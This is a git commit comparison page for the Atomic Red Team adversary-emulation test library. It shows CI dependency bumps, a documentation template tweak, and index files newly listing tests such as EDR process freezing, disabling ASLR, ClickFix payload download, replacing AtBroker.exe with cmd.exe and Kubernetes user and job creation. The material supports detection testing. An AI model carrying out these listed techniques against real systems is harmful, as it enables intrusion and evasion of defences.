Compare commits
58 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
 Hare Sudhan
|
825d8a23e4 | ||
|
dependabot[bot]
|
c173f44a0c | ||
|
Atomic Red Team doc generator
|
70e8efd512 | ||
|
Vladan Sekulic
|
4f16386fc7 | ||
|
dependabot[bot]
|
c62a9819ad | ||
|
dependabot[bot]
|
3f2beabd01 | ||
|
dependabot[bot]
|
88f5b507d1 | ||
|
Atomic Red Team doc generator
|
0de6af53a1 | ||
|
Vladan Sekulic
|
79ff2fac43 | ||
|
Atomic Red Team doc generator
|
7d0948382d | ||
|
hfz
|
e71c0c3b57 | ||
|
Atomic Red Team doc generator
|
6e5582f7a6 | ||
|
Vladan Sekulic
|
07a88142a7 | ||
|
dependabot[bot]
|
79a3602930 | ||
|
dependabot[bot]
|
aa4d9e2bec | ||
|
dependabot[bot]
|
0c89f6317e | ||
|
dependabot[bot]
|
340a7b9e5f | ||
|
dependabot[bot]
|
e197ef4b0c | ||
|
dependabot[bot]
|
9a6f46abbc | ||
|
Atomic Red Team doc generator
|
b3dc12d415 | ||
|
Hare Sudhan
|
5bc874cbb8 | ||
|
dependabot[bot]
|
71ecccaff2 | ||
|
Atomic Red Team doc generator
|
7bf645a086 | ||
|
PhyoPaingHtun ChiLai
|
d951b5b4ac | ||
|
Atomic Red Team doc generator
|
f6ef319334 | ||
|
0xPrashanthSec
|
5546e590b8 | ||
|
dependabot[bot]
|
e609b0c535 | ||
|
dependabot[bot]
|
f1f5833b37 | ||
|
dependabot[bot]
|
dd526047b8 | ||
|
Atomic Red Team doc generator
|
47c80ca1e1 | ||
|
0xseiryuu
|
bf100b8920 | ||
|
dependabot[bot]
|
f5c4f92ee2 | ||
|
Hare Sudhan
|
9b17e83ebe | ||
|
Atomic Red Team doc generator
|
6c85c88c55 | ||
|
Bhavin Patel
|
2006f34c95 | ||
|
Atomic Red Team doc generator
|
e2115e52c0 | ||
|
Bhavin Patel
|
1a197af893 | ||
|
Atomic Red Team doc generator
|
55c553ddd3 | ||
|
Hare Sudhan
|
a3c1d8157d | ||
|
dependabot[bot]
|
90b0b774b9 | ||
|
Atomic Red Team doc generator
|
149e41f748 | ||
|
Milad Cheraghi
|
b41248c790 | ||
|
Atomic Red Team doc generator
|
ee95152c22 | ||
|
ohadm-cynet
|
be0b138294 | ||
|
Atomic Red Team doc generator
|
0f41fdc8d4 | ||
|
Milad Cheraghi
|
c87eab6a23 | ||
|
dependabot[bot]
|
0fe201b898 | ||
|
dependabot[bot]
|
b5c2b8f422 | ||
|
Atomic Red Team doc generator
|
812ad23b22 | ||
|
wikijm
|
aecf7ddca9 | ||
|
Atomic Red Team doc generator
|
07affd5c64 | ||
|
Casey Hennings
|
eabf4e722d | ||
|
Atomic Red Team doc generator
|
a4bf8b76bd | ||
|
Milad Cheraghi
|
86a5c2faa0 | ||
|
Atomic Red Team doc generator
|
92bf9b4130 | ||
|
Simon Maréchal
|
8669f17027 | ||
|
Atomic Red Team doc generator
|
1c32e5d6c7 | ||
|
Michael Haag
|
d641158872 |
@@ -8,12 +8,12 @@ assignees: ''
|
||||
---
|
||||
|
||||
<!--
|
||||
For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
|
||||
For reference, check out this article that explains how to properly submit a new atomic test: https://www.atomicredteam.io/atomic-red-team/docs/designing-atomic-tests.
|
||||
-->
|
||||
|
||||
### Technique ID: TXXXX
|
||||
|
||||
### Additional Details
|
||||
<!--
|
||||
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
|
||||
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
|
||||
-->
|
||||
|
||||
@@ -8,7 +8,7 @@ jobs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: checkout repo
|
||||
uses: actions/checkout@v5
|
||||
uses: actions/checkout@v6
|
||||
with:
|
||||
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
|
||||
|
||||
|
||||
@@ -12,7 +12,7 @@ jobs:
|
||||
runs-on: macos-latest
|
||||
steps:
|
||||
- name: checkout repo
|
||||
uses: actions/checkout@v5
|
||||
uses: actions/checkout@v6
|
||||
- name: Install poetry
|
||||
run: pipx install poetry
|
||||
- name: setup python3.11
|
||||
|
||||
@@ -7,7 +7,7 @@ jobs:
|
||||
stale:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/stale@v9
|
||||
- uses: actions/stale@v10
|
||||
with:
|
||||
stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
|
||||
stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
|
||||
|
||||
@@ -10,7 +10,7 @@ jobs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: checkout repo
|
||||
uses: actions/checkout@v5
|
||||
uses: actions/checkout@v6
|
||||
- name: Install poetry
|
||||
run: pipx install poetry
|
||||
- name: setup python3.11
|
||||
@@ -33,7 +33,7 @@ jobs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: checkout repo
|
||||
uses: actions/checkout@v5
|
||||
uses: actions/checkout@v6
|
||||
- name: Install poetry
|
||||
run: pipx install poetry
|
||||
- name: setup python3.11
|
||||
@@ -69,7 +69,7 @@ jobs:
|
||||
env:
|
||||
PYTHONPATH: ${{ github.workspace }}
|
||||
|
||||
- uses: actions/upload-artifact@v4
|
||||
- uses: actions/upload-artifact@v5
|
||||
with:
|
||||
name: labels.json
|
||||
path: atomic_red_team/pr/
|
||||
|
||||
@@ -11,7 +11,7 @@ jobs:
|
||||
validate-terraform:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v5
|
||||
- uses: actions/checkout@v6
|
||||
- uses: hashicorp/setup-terraform@v3
|
||||
|
||||
- name: Terraform fmt
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
# Atomic Red Team
|
||||
|
||||
  
|
||||
  
|
||||
|
||||
|
||||
Atomic Red Team™ is a library of tests mapped to the
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
|
||||
<blockquote>
|
||||
|
||||
<%= technique['description'].gsub("%\\<", "%<") %>
|
||||
<%= technique['description'].gsub("%\\<", "%<").gsub(/<code>.*?<\/code>/) { |match| match.gsub('~', '\~') } %>
|
||||
|
||||
</blockquote>
|
||||
|
||||
|
||||
+876774
-613898
File diff suppressed because one or more lines are too long
@@ -1 +1 @@
|
||||
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
|
||||
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -6,6 +6,7 @@ credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-
|
||||
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
|
||||
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
|
||||
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
|
||||
persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
|
||||
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
|
||||
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
|
||||
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
|
||||
|
||||
|
@@ -31,6 +31,8 @@ discovery,T1201,Password Policy Discovery,12,Examine AWS Password Policy,1533082
|
||||
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
|
||||
discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
|
||||
discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
|
||||
collection,T1530,Data from Cloud Storage Object,1,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
|
||||
collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
|
||||
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
|
||||
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
|
||||
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
|
||||
@@ -48,8 +50,6 @@ privilege-escalation,T1098,Account Manipulation,17,GCP - Delete Service Account
|
||||
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
|
||||
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
|
||||
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
|
||||
collection,T1530,Data from Cloud Storage Object,1,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
|
||||
collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
|
||||
|
||||
|
@@ -180,6 +180,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encod
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
|
||||
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
|
||||
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
|
||||
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
|
||||
@@ -538,6 +539,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
|
||||
@@ -824,6 +827,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
|
||||
@@ -946,6 +950,7 @@ privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistenc
|
||||
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
|
||||
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
|
||||
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
|
||||
privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
|
||||
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
|
||||
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
|
||||
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
|
||||
@@ -1007,6 +1012,7 @@ execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Down
|
||||
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
|
||||
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
|
||||
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
|
||||
execution,T1204.002,User Execution: Malicious File,13,Simulate Click-Fix via Downloaded BAT File,22386853-f68d-4b50-a362-de235127c443,powershell
|
||||
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
|
||||
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
|
||||
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
|
||||
@@ -1099,6 +1105,7 @@ execution,T1569.002,System Services: Service Execution,7,Modifying ACL of Servic
|
||||
execution,T1569.002,System Services: Service Execution,8,Pipe Creation - PsExec Tool Execution From Suspicious Locations,004a5d68-627b-452d-af3d-43bd1fc75a3b,powershell
|
||||
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
|
||||
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
|
||||
execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
|
||||
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
|
||||
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
|
||||
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
|
||||
@@ -1285,6 +1292,7 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux
|
||||
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
|
||||
persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
|
||||
persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
|
||||
persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
|
||||
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
|
||||
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
|
||||
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
|
||||
@@ -1303,6 +1311,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replac
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
|
||||
@@ -1422,6 +1431,7 @@ persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automat
|
||||
persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
|
||||
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
|
||||
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
|
||||
persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
|
||||
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
|
||||
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
|
||||
